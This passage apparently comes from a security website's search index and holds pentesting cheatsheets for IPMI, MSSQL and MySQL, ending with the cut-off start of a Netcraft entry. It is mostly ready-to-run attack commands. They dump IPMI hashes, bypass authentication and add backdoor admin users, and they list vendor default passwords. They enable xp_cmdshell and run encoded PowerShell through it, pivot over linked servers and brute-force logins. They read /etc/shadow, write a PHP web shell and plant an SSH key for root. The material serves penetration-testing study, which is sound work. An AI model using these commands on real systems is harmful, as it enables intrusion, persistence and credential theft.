Can give full remote control even if OS is down.\nDetection \u0026amp; Version nmap -sU -p 623 \u0026lt;ip\u0026gt; nmap -sU -p 623 --script ipmi-version \u0026lt;ip\u0026gt; Nmap Scripts nmap -sU -p 623 --script ipmi-version \u0026lt;ip\u0026gt; nmap -sU -p 623 --script ipmi-cipher-zero \u0026lt;ip\u0026gt; # Check for Cipher 0 auth bypass Metasploit Modules # Version detection use auxiliary/scanner/ipmi/ipmi_version set RHOSTS \u0026lt;ip\u0026gt; run # Dump RAKP hashes (no auth needed) use auxiliary/scanner/ipmi/ipmi_dumphashes set RHOSTS \u0026lt;ip\u0026gt; run # Cipher 0 auth bypass (unauthenticated admin access) use auxiliary/scanner/ipmi/ipmi_cipher_zero set RHOSTS \u0026lt;ip\u0026gt; run ipmitool (Direct Interaction) # Version/status ipmitool -I lanplus -H \u0026lt;ip\u0026gt; -U admin -P admin chassis status # List users ipmitool -I lanplus -H \u0026lt;ip\u0026gt; -U admin -P admin user list # LAN config ipmitool -I lanplus -H \u0026lt;ip\u0026gt; -U admin -P admin lan print # Power control ipmitool -I lanplus -H \u0026lt;ip\u0026gt; -U admin -P admin power status ipmitool -I lanplus -H \u0026lt;ip\u0026gt; -U admin -P admin power reset # Add user (post-compromise) ipmitool -I lanplus -H \u0026lt;ip\u0026gt; -U admin -P admin user set name 4 hacker ipmitool -I lanplus -H \u0026lt;ip\u0026gt; -U admin -P admin user set password 4 Password1 ipmitool -I lanplus -H \u0026lt;ip\u0026gt; -U admin -P admin user priv 4 4 # Admin priv ipmitool -I lanplus -H \u0026lt;ip\u0026gt; -U admin -P admin user enable 4 Hash Cracking (After RAKP Dump) # Hashcat mode 7300 = IPMI2 RAKP HMAC-SHA1 hashcat -m 7300 hashes.txt wordlist.txt hashcat -m 7300 hashes.txt wordlist.txt -r rules/best64.rule Default Credentials Vendor / Interface Username Default Password Dell iDRAC root calvin HP iLO Administrator (printed on pull tab) Supermicro IPMI ADMIN ADMIN IBM IMM USERID PASSW0RD Cisco CIMC admin password Intel RMM admin (blank) Key Vulnerabilities Issue Description Cipher 0 Allows 
unauthenticated auth bypass — attacker can set any password RAKP hash dump IPMI spec allows anyone to request auth hash → offline crack Default creds Most systems ship with known default credentials Anonymous auth Some BMCs allow completely anonymous access ","permalink":"https://d3vilsec.com/cheatsheets/pentesting/footprinting/ipmi/","title":"IPMI"},{"content":"MSSQL Enumeration Cheatsheet Default Ports: 1433 (TCP), 1434 (UDP — SQL Server Browser)\nDiscovery \u0026amp; Nmap Scripts nmap -p 1433 --script ms-sql-info \u0026lt;ip\u0026gt; nmap -p 1433 --script ms-sql-config \u0026lt;ip\u0026gt; nmap -p 1433 --script ms-sql-empty-password \u0026lt;ip\u0026gt; nmap -p 1433 --script ms-sql-brute \u0026lt;ip\u0026gt; nmap -sU -p 1434 --script ms-sql-dac \u0026lt;ip\u0026gt; # Discover dynamic ports via UDP nmap -p 1433 --script ms-sql-* \u0026lt;ip\u0026gt; # All MSSQL scripts Metasploit Modules use auxiliary/scanner/mssql/mssql_ping # Discovery + version use auxiliary/scanner/mssql/mssql_login # Brute force auth use auxiliary/admin/mssql/mssql_sql # Execute SQL query use auxiliary/admin/mssql/mssql_exec # OS command execution (xp_cmdshell) use auxiliary/admin/mssql/mssql_enum # Full enumeration use auxiliary/admin/mssql/mssql_enum_sql_logins # Enumerate SQL logins mssqlclient.py (impacket) # Connect with SQL auth python3 mssqlclient.py \u0026lt;user\u0026gt;:\u0026lt;pass\u0026gt;@\u0026lt;ip\u0026gt; # Connect with Windows auth python3 mssqlclient.py \u0026lt;domain\u0026gt;/\u0026lt;user\u0026gt;:\u0026lt;pass\u0026gt;@\u0026lt;ip\u0026gt; -windows-auth # Connect with hash (Pass-the-Hash) python3 mssqlclient.py \u0026lt;domain\u0026gt;/\u0026lt;user\u0026gt;@\u0026lt;ip\u0026gt; -hashes :\u0026lt;nthash\u0026gt; -windows-auth Useful SQL Queries -- Version and user info SELECT @@version; SELECT system_user; SELECT user_name(); SELECT DB_NAME(); -- Check if sysadmin SELECT IS_SRVROLEMEMBER(\u0026#39;sysadmin\u0026#39;); SELECT IS_MEMBER(\u0026#39;db_owner\u0026#39;); -- List databases SELECT name FROM sys.databases; USE \u0026lt;database\u0026gt;; SELECT table_name FROM information_schema.tables; -- List users and roles SELECT name, type_desc FROM sys.server_principals; SELECT name FROM sys.syslogins; SELECT 
roles.name FROM sys.server_role_members JOIN sys.server_principals AS roles ON roles.principal_id = server_role_members.role_principal_id JOIN sys.server_principals AS members ON members.principal_id = server_role_members.member_principal_id WHERE members.name = \u0026#39;\u0026lt;user\u0026gt;\u0026#39;; xp_cmdshell (OS Command Execution) -- Enable xp_cmdshell (requires sysadmin) EXEC sp_configure \u0026#39;show advanced options\u0026#39;, 1; RECONFIGURE; EXEC sp_configure \u0026#39;xp_cmdshell\u0026#39;, 1; RECONFIGURE; -- Run commands EXEC xp_cmdshell \u0026#39;whoami\u0026#39;; EXEC xp_cmdshell \u0026#39;net user\u0026#39;; EXEC xp_cmdshell \u0026#39;powershell -enc \u0026lt;base64payload\u0026gt;\u0026#39;; Linked Servers (Lateral Movement) -- Enumerate linked servers SELECT * FROM sys.servers; EXEC sp_linkedservers; -- Execute query on linked server EXECUTE(\u0026#39;SELECT @@version\u0026#39;) AT [\u0026lt;linked_server\u0026gt;]; EXECUTE(\u0026#39;SELECT system_user\u0026#39;) AT [\u0026lt;linked_server\u0026gt;]; -- Execute OS command via linked server EXECUTE(\u0026#39;EXEC xp_cmdshell \u0026#39;\u0026#39;whoami\u0026#39;\u0026#39;\u0026#39;) AT [\u0026lt;linked_server\u0026gt;]; Brute Force hydra -l sa -P wordlist.txt mssql://\u0026lt;ip\u0026gt; medusa -h \u0026lt;ip\u0026gt; -u sa -P wordlist.txt -M mssql crackmapexec mssql \u0026lt;ip\u0026gt; -u \u0026lt;user\u0026gt; -p wordlist.txt File Read / Write -- Read file (via BULK INSERT or OPENROWSET) SELECT * FROM OPENROWSET(BULK \u0026#39;C:\\Windows\\win.ini\u0026#39;, SINGLE_CLOB) AS t; -- Write file (via xp_cmdshell) EXEC xp_cmdshell \u0026#39;echo hacked \u0026gt; C:\\inetpub\\wwwroot\\shell.txt\u0026#39;; ","permalink":"https://d3vilsec.com/cheatsheets/pentesting/footprinting/mssql/","title":"MSSQL"},{"content":"MySQL Enumeration Cheatsheet Default Port: 3306 (TCP)\nConnection \u0026amp; Banner Grabbing nc -nv \u0026lt;ip\u0026gt; 3306 # Banner grab mysql -u root -h \u0026lt;ip\u0026gt; # No password mysql -u root -p -h \u0026lt;ip\u0026gt; # Prompt for password mysql -u root -p\u0026lt;password\u0026gt; -h \u0026lt;ip\u0026gt; # Inline password (no space) mysql -u root -h \u0026lt;ip\u0026gt; -e \u0026#34;SELECT version();\u0026#34; # One-liner query Nmap Scripts nmap -p 3306 --script mysql-info \u0026lt;ip\u0026gt; nmap -p 3306 --script mysql-databases \\ --script-args mysqluser=root,mysqlpass=\u0026#39;\u0026#39; \u0026lt;ip\u0026gt; nmap -p 3306 --script mysql-empty-password \u0026lt;ip\u0026gt; nmap -p 3306 --script mysql-brute \u0026lt;ip\u0026gt; nmap -p 3306 --script mysql-audit \u0026lt;ip\u0026gt; nmap -p 3306 --script mysql-vuln-cve2012-2122 \u0026lt;ip\u0026gt; nmap -p 3306 --script mysql-* \u0026lt;ip\u0026gt; # All MySQL scripts Enumeration Queries -- Version and environment SELECT version(); SELECT @@version; SELECT user(); SELECT @@datadir; SELECT @@basedir; SELECT @@hostname; -- Databases and tables SHOW 
databases; USE \u0026lt;database\u0026gt;; SHOW tables; DESCRIBE \u0026lt;table\u0026gt;; SELECT * FROM \u0026lt;table\u0026gt; LIMIT 5; SELECT table_schema, table_name FROM information_schema.tables; -- Users and privileges SELECT user, host, authentication_string FROM mysql.user; SELECT user, host, password FROM mysql.user; -- older MySQL SELECT * FROM information_schema.user_privileges; SHOW GRANTS FOR \u0026#39;\u0026lt;user\u0026gt;\u0026#39;@\u0026#39;\u0026lt;host\u0026gt;\u0026#39;; SHOW GRANTS FOR CURRENT_USER(); -- Check FILE privilege SELECT user, host, File_priv FROM mysql.user; File Read / Write (Requires FILE Privilege) -- Read files SELECT LOAD_FILE(\u0026#39;/etc/passwd\u0026#39;); SELECT LOAD_FILE(\u0026#39;/etc/shadow\u0026#39;); SELECT LOAD_FILE(\u0026#39;C:/Windows/System32/drivers/etc/hosts\u0026#39;); -- Write files (web shell) SELECT \u0026#39;\u0026lt;?php system($_GET[\u0026#34;cmd\u0026#34;]); ?\u0026gt;\u0026#39; INTO OUTFILE \u0026#39;/var/www/html/shell.php\u0026#39;; -- Write SSH key SELECT \u0026#39;ssh-rsa AAAA...\u0026#39; INTO OUTFILE \u0026#39;/root/.ssh/authorized_keys\u0026#39;; Brute Force hydra -l root -P wordlist.txt mysql://\u0026lt;ip\u0026gt; hydra -L users.txt -P wordlist.txt mysql://\u0026lt;ip\u0026gt; medusa -h \u0026lt;ip\u0026gt; -u root -P wordlist.txt -M mysql User-Defined Functions (UDF) for Privilege Escalation -- Check if plugin dir is writable (post-login) SHOW variables LIKE \u0026#39;plugin_dir\u0026#39;; -- Drop malicious UDF .so/.dll into plugin dir, -- then create the function and execute OS commands CREATE FUNCTION sys_exec RETURNS INT SONAME \u0026#39;lib_mysqludf_sys.so\u0026#39;; SELECT sys_exec(\u0026#39;id \u0026gt; /tmp/out\u0026#39;); Common Credentials to Try root : (blank) root : root root : password root : mysql root : toor admin : admin ","permalink":"https://d3vilsec.com/cheatsheets/pentesting/footprinting/mysql/","summary":"\u003ch1 id=\"mysql-enumeration-cheatsheet\"\u003eMySQL Enumeration 
Cheatsheet\u003c/h1\u003e\n\u003cp\u003e\u003cstrong\u003eDefault Port:\u003c/strong\u003e 3306 (TCP)\u003c/p\u003e\n\u003chr\u003e\n\u003ch2 id=\"connection--banner-grabbing\"\u003eConnection \u0026amp; Banner Grabbing\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003enc -nv \u0026lt;ip\u0026gt; \u003cspan style=\"color:#ae81ff\"\u003e3306\u003c/span\u003e                             \u003cspan style=\"color:#75715e\"\u003e# Banner grab\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003emysql -u root -h \u0026lt;ip\u0026gt;                        \u003cspan style=\"color:#75715e\"\u003e# No password\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003emysql -u root -p -h \u0026lt;ip\u0026gt;                     \u003cspan style=\"color:#75715e\"\u003e# Prompt for password\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003emysql -u root -p\u0026lt;password\u0026gt; -h \u0026lt;ip\u0026gt;           \u003cspan style=\"color:#75715e\"\u003e# Inline password (no space)\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003emysql -u root -h \u0026lt;ip\u0026gt; -e \u003cspan style=\"color:#e6db74\"\u003e\u0026#34;SELECT version();\u0026#34;\u003c/span\u003e \u003cspan style=\"color:#75715e\"\u003e# One-liner query\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"nmap-scripts\"\u003eNmap Scripts\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" 
style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003enmap -p \u003cspan style=\"color:#ae81ff\"\u003e3306\u003c/span\u003e --script mysql-info \u0026lt;ip\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003enmap -p \u003cspan style=\"color:#ae81ff\"\u003e3306\u003c/span\u003e --script mysql-databases \u003cspan style=\"color:#ae81ff\"\u003e\\\n\u003c/span\u003e\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e  --script-args mysqluser\u003cspan style=\"color:#f92672\"\u003e=\u003c/span\u003eroot,mysqlpass\u003cspan style=\"color:#f92672\"\u003e=\u003c/span\u003e\u003cspan style=\"color:#e6db74\"\u003e\u0026#39;\u0026#39;\u003c/span\u003e \u0026lt;ip\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003enmap -p \u003cspan style=\"color:#ae81ff\"\u003e3306\u003c/span\u003e --script mysql-empty-password \u0026lt;ip\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003enmap -p \u003cspan style=\"color:#ae81ff\"\u003e3306\u003c/span\u003e --script mysql-brute \u0026lt;ip\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003enmap -p \u003cspan style=\"color:#ae81ff\"\u003e3306\u003c/span\u003e --script mysql-audit \u0026lt;ip\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003enmap -p \u003cspan style=\"color:#ae81ff\"\u003e3306\u003c/span\u003e --script mysql-vuln-cve2012-2122 \u0026lt;ip\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003enmap -p \u003cspan style=\"color:#ae81ff\"\u003e3306\u003c/span\u003e --script mysql-* \u0026lt;ip\u0026gt;             \u003cspan 
style=\"color:#75715e\"\u003e# All MySQL scripts\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"enumeration-queries\"\u003eEnumeration Queries\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-sql\" data-lang=\"sql\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e-- Version and environment\n\u003c/span\u003e\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#66d9ef\"\u003eSELECT\u003c/span\u003e \u003cspan style=\"color:#66d9ef\"\u003eversion\u003c/span\u003e();\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#66d9ef\"\u003eSELECT\u003c/span\u003e \u003cspan style=\"color:#f92672\"\u003e@@\u003c/span\u003e\u003cspan style=\"color:#66d9ef\"\u003eversion\u003c/span\u003e;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#66d9ef\"\u003eSELECT\u003c/span\u003e \u003cspan style=\"color:#66d9ef\"\u003euser\u003c/span\u003e();\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#66d9ef\"\u003eSELECT\u003c/span\u003e \u003cspan style=\"color:#f92672\"\u003e@@\u003c/span\u003edatadir;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#66d9ef\"\u003eSELECT\u003c/span\u003e \u003cspan style=\"color:#f92672\"\u003e@@\u003c/span\u003ebasedir;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#66d9ef\"\u003eSELECT\u003c/span\u003e \u003cspan 
style=\"color:#f92672\"\u003e@@\u003c/span\u003ehostname;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e-- Databases and tables\n\u003c/span\u003e\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#66d9ef\"\u003eSHOW\u003c/span\u003e databases;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eUSE \u003cspan style=\"color:#f92672\"\u003e\u0026lt;\u003c/span\u003e\u003cspan style=\"color:#66d9ef\"\u003edatabase\u003c/span\u003e\u003cspan style=\"color:#f92672\"\u003e\u0026gt;\u003c/span\u003e;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#66d9ef\"\u003eSHOW\u003c/span\u003e tables;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#66d9ef\"\u003eDESCRIBE\u003c/span\u003e \u003cspan style=\"color:#f92672\"\u003e\u0026lt;\u003c/span\u003e\u003cspan style=\"color:#66d9ef\"\u003etable\u003c/span\u003e\u003cspan style=\"color:#f92672\"\u003e\u0026gt;\u003c/span\u003e;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#66d9ef\"\u003eSELECT\u003c/span\u003e \u003cspan style=\"color:#f92672\"\u003e*\u003c/span\u003e \u003cspan style=\"color:#66d9ef\"\u003eFROM\u003c/span\u003e \u003cspan style=\"color:#f92672\"\u003e\u0026lt;\u003c/span\u003e\u003cspan style=\"color:#66d9ef\"\u003etable\u003c/span\u003e\u003cspan style=\"color:#f92672\"\u003e\u0026gt;\u003c/span\u003e \u003cspan style=\"color:#66d9ef\"\u003eLIMIT\u003c/span\u003e \u003cspan style=\"color:#ae81ff\"\u003e5\u003c/span\u003e;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan 
style=\"color:#66d9ef\"\u003eSELECT\u003c/span\u003e table_schema, \u003cspan style=\"color:#66d9ef\"\u003etable_name\u003c/span\u003e \u003cspan style=\"color:#66d9ef\"\u003eFROM\u003c/span\u003e information_schema.tables;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e-- Users and privileges\n\u003c/span\u003e\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#66d9ef\"\u003eSELECT\u003c/span\u003e \u003cspan style=\"color:#66d9ef\"\u003euser\u003c/span\u003e, \u003cspan style=\"color:#66d9ef\"\u003ehost\u003c/span\u003e, authentication_string \u003cspan style=\"color:#66d9ef\"\u003eFROM\u003c/span\u003e mysql.\u003cspan style=\"color:#66d9ef\"\u003euser\u003c/span\u003e;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#66d9ef\"\u003eSELECT\u003c/span\u003e \u003cspan style=\"color:#66d9ef\"\u003euser\u003c/span\u003e, \u003cspan style=\"color:#66d9ef\"\u003ehost\u003c/span\u003e, password \u003cspan style=\"color:#66d9ef\"\u003eFROM\u003c/span\u003e mysql.\u003cspan style=\"color:#66d9ef\"\u003euser\u003c/span\u003e;         \u003cspan style=\"color:#75715e\"\u003e-- older MySQL\n\u003c/span\u003e\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#66d9ef\"\u003eSELECT\u003c/span\u003e \u003cspan style=\"color:#f92672\"\u003e*\u003c/span\u003e \u003cspan style=\"color:#66d9ef\"\u003eFROM\u003c/span\u003e information_schema.user_privileges;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#66d9ef\"\u003eSHOW\u003c/span\u003e GRANTS \u003cspan style=\"color:#66d9ef\"\u003eFOR\u003c/span\u003e \u003cspan 
style=\"color:#e6db74\"\u003e\u0026#39;\u0026lt;user\u0026gt;\u0026#39;\u003c/span\u003e\u003cspan style=\"color:#f92672\"\u003e@\u003c/span\u003e\u003cspan style=\"color:#e6db74\"\u003e\u0026#39;\u0026lt;host\u0026gt;\u0026#39;\u003c/span\u003e;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#66d9ef\"\u003eSHOW\u003c/span\u003e GRANTS \u003cspan style=\"color:#66d9ef\"\u003eFOR\u003c/span\u003e \u003cspan style=\"color:#66d9ef\"\u003eCURRENT_USER\u003c/span\u003e();\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e-- Check FILE privilege\n\u003c/span\u003e\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#66d9ef\"\u003eSELECT\u003c/span\u003e \u003cspan style=\"color:#66d9ef\"\u003euser\u003c/span\u003e, \u003cspan style=\"color:#66d9ef\"\u003ehost\u003c/span\u003e, File_priv \u003cspan style=\"color:#66d9ef\"\u003eFROM\u003c/span\u003e mysql.\u003cspan style=\"color:#66d9ef\"\u003euser\u003c/span\u003e;\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"file-read--write-requires-file-privilege\"\u003eFile Read / Write (Requires FILE Privilege)\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-sql\" data-lang=\"sql\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e-- Read files\n\u003c/span\u003e\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#66d9ef\"\u003eSELECT\u003c/span\u003e LOAD_FILE(\u003cspan 
style=\"color:#e6db74\"\u003e\u0026#39;/etc/passwd\u0026#39;\u003c/span\u003e);\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#66d9ef\"\u003eSELECT\u003c/span\u003e LOAD_FILE(\u003cspan style=\"color:#e6db74\"\u003e\u0026#39;/etc/shadow\u0026#39;\u003c/span\u003e);\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#66d9ef\"\u003eSELECT\u003c/span\u003e LOAD_FILE(\u003cspan style=\"color:#e6db74\"\u003e\u0026#39;C:/Windows/System32/drivers/etc/hosts\u0026#39;\u003c/span\u003e);\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e-- Write files (web shell)\n\u003c/span\u003e\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#66d9ef\"\u003eSELECT\u003c/span\u003e \u003cspan style=\"color:#e6db74\"\u003e\u0026#39;\u0026lt;?php system($_GET[\u0026#34;cmd\u0026#34;]); ?\u0026gt;\u0026#39;\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e  \u003cspan style=\"color:#66d9ef\"\u003eINTO\u003c/span\u003e OUTFILE \u003cspan style=\"color:#e6db74\"\u003e\u0026#39;/var/www/html/shell.php\u0026#39;\u003c/span\u003e;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e-- Write SSH key\n\u003c/span\u003e\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#66d9ef\"\u003eSELECT\u003c/span\u003e \u003cspan style=\"color:#e6db74\"\u003e\u0026#39;ssh-rsa AAAA...\u0026#39;\u003c/span\u003e \u003cspan 
style=\"color:#66d9ef\"\u003eINTO\u003c/span\u003e OUTFILE \u003cspan style=\"color:#e6db74\"\u003e\u0026#39;/root/.ssh/authorized_keys\u0026#39;\u003c/span\u003e;\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"brute-force\"\u003eBrute Force\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ehydra -l root -P wordlist.txt mysql://\u0026lt;ip\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ehydra -L users.txt -P wordlist.txt mysql://\u0026lt;ip\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003emedusa -h \u0026lt;ip\u0026gt; -u root -P wordlist.txt -M mysql\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"user-defined-functions-udf-for-privilege-escalation\"\u003eUser-Defined Functions (UDF) for Privilege Escalation\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-sql\" data-lang=\"sql\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e-- Check if plugin dir is writable (post-login)\n\u003c/span\u003e\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#66d9ef\"\u003eSHOW\u003c/span\u003e variables \u003cspan style=\"color:#66d9ef\"\u003eLIKE\u003c/span\u003e \u003cspan 
style=\"color:#e6db74\"\u003e\u0026#39;plugin_dir\u0026#39;\u003c/span\u003e;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e-- Drop malicious UDF .so/.dll into plugin dir,\n\u003c/span\u003e\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e-- then create the function and execute OS commands\n\u003c/span\u003e\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#66d9ef\"\u003eCREATE\u003c/span\u003e \u003cspan style=\"color:#66d9ef\"\u003eFUNCTION\u003c/span\u003e sys_exec \u003cspan style=\"color:#66d9ef\"\u003eRETURNS\u003c/span\u003e INT SONAME \u003cspan style=\"color:#e6db74\"\u003e\u0026#39;lib_mysqludf_sys.so\u0026#39;\u003c/span\u003e;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#66d9ef\"\u003eSELECT\u003c/span\u003e sys_exec(\u003cspan style=\"color:#e6db74\"\u003e\u0026#39;id \u0026gt; /tmp/out\u0026#39;\u003c/span\u003e);\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"common-credentials-to-try\"\u003eCommon Credentials to Try\u003c/h2\u003e\n\u003cpre tabindex=\"0\"\u003e\u003ccode\u003eroot : (blank)\nroot : root\nroot : password\nroot : mysql\nroot : toor\nadmin : admin\n\u003c/code\u003e\u003c/pre\u003e","title":"MySQL"},{"content":"Netcraft Cheatsheet Purpose: Passive reconnaissance — hosting history, OS / web server history, SSL certificate history, site report, and subdomain discovery for a target domain. Uses Netcraft\u0026rsquo;s long-running internet survey, so no traffic touches the target.\nFormat: Web service. 
